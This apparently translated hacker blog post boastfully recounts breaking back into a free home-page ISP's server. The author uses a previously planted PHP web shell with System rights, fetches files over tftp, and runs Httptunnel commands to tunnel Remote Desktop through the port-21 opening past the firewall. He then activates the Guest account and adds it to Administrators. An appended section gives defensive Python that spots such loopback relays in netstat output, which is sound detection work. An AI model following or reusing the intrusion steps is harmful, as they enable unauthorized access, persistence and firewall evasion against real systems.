From: http://www.oioj.net/

My home ISP, a free personal home page service; in the days that followed, I often logged in through port 3389, constantly patched its vulnerabilities, did some management and maintenance, and learned a lot myself. Recently, while delving into network security technology, I once again brought up the Windows 2000 Terminal Services client, wanting to get onto that server, and the result was the prompt: "The client cannot connect to the Terminal Server. The server may be too busy. Please try connecting again later." I tried several times and could not connect, so I quickly ran a scan with a scanning tool and found that the server now had only ports 21 and 80 open. What was going on? Had the administrator changed the system configuration?

I checked whether the PHP Web Shell I had previously placed on the server, which has System permissions, was still there. I opened http://cn.*.com/door/scripts/info.php and my horse was still alive. That made me very happy; the administrator must not have reinstalled the system. In the PHP Web Shell command box I entered netstat -an and clicked execute, and the output included this line:

    TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING

This shows that the Terminal Service had not been turned off; the firewall was only shielding port 3389 from the outside. The administrator had become smarter, but how could this little obstacle stump a worm who is a veteran of many years in the hacker camp? Since ports 21 and 80 are open, and I have a back door with System permissions on port 80, let's start from here and go through a TCP hidden channel!
A TCP hidden channel (TCP tunnel) is a communication method that bypasses a firewall's port blocking. On the local side, data that the firewall prohibits is encapsulated in a packet type or port that the firewall allows; it then passes through the firewall to the other end of the communication. When the encapsulated packet reaches its destination it is restored, and the restored packet is delivered to the corresponding service. There are now many tools that implement TCP hidden channels; I used Httptunnel for Win. On my machine I ran the HTC client:

    htc -F 3389 cn..com:21

so that data sent to port 3389 on my machine is packaged by HTC and sent to port 21 of cn.**.com. Using the PHP Web Shell command

    tftp -i myip get [file]

I uploaded two files to the server: the Httptunnel server program hts.exe and the cygwin1.dll it requires. Then I ran the Httptunnel server with the following command:

    hts -F localhost:3389 21

so that data arriving on port 21 is unpacked by hts and forwarded to local port 3389. The reason I used port 21 rather than port 80 is that I have a Web Shell: if something goes wrong on port 21, I can kill the process from the Shell, whereas if I used port 80 and an unexpected error occurred, I could not handle it.

Next, I used the PHP Web Shell to activate the Guest account and add it to the Administrators group. I filled in the server address in the Windows 2000 Terminal Services client and, after a wait a little longer than it used to be, the Telnet interface finally appeared! Once connected, I could use the server as easily as my own machine!
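
From the defender's side, the relay described above leaves a visible trace in the same `netstat -an` output: a Terminal Services session on port 3389 whose peer is the loopback address, while the only external sessions are on the ports the firewall allows. The following is an added example, not code from the original post; the sample output is constructed (documentation address ranges) and the function names are hypothetical.

```python
import ipaddress

# Constructed sample of Windows `netstat -an` output (not from the original post).
SAMPLE = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    192.0.2.10:21          198.51.100.7:4312      ESTABLISHED
  TCP    127.0.0.1:1045         127.0.0.1:3389         ESTABLISHED
  TCP    127.0.0.1:3389         127.0.0.1:1045         ESTABLISHED
  TCP    192.0.2.10:80          203.0.113.5:2210       ESTABLISHED
"""

def split_endpoint(endpoint):
    """Split 'addr:port' (or '[v6]:port') into (ip_address, port)."""
    host, _, port = endpoint.rpartition(":")
    return ipaddress.ip_address(host.strip("[]")), int(port)

def parse_netstat(text):
    """Yield (local_ip, local_port, remote_ip, remote_port, state) for TCP rows."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4 or fields[0].upper() != "TCP":
            continue  # header, UDP rows, blank lines
        try:
            local, remote = split_endpoint(fields[1]), split_endpoint(fields[2])
        except ValueError:
            continue  # e.g. '*:*' or a truncated row
        yield (*local, *remote, fields[3].upper())

def loopback_sessions(text, service_ports=(3389,)):
    """Return ESTABLISHED sessions to a watched local service whose peer is loopback."""
    hits = []
    for lip, lport, rip, rport, state in parse_netstat(text):
        if state == "ESTABLISHED" and lport in service_ports and rip.is_loopback:
            hits.append((str(rip), rport, lport))
    return hits

def externally_served_ports(text):
    """Return listening ports that currently carry a session from a non-loopback peer."""
    listening = {lport for _, lport, _, _, st in parse_netstat(text) if st == "LISTENING"}
    return sorted({lport for _, lport, rip, _, st in parse_netstat(text)
                   if st == "ESTABLISHED" and lport in listening and not rip.is_loopback})

if __name__ == "__main__":
    for peer, peer_port, svc in loopback_sessions(SAMPLE):
        print(f"port {svc}: session from {peer}:{peer_port} (local relay?)")
    print("ports with external peers:", externally_served_ports(SAMPLE))
```

A loopback peer on 3389 together with a long-lived external session on another listening port is the pair worth investigating: identify the process that owns that port and compare it with the service expected there.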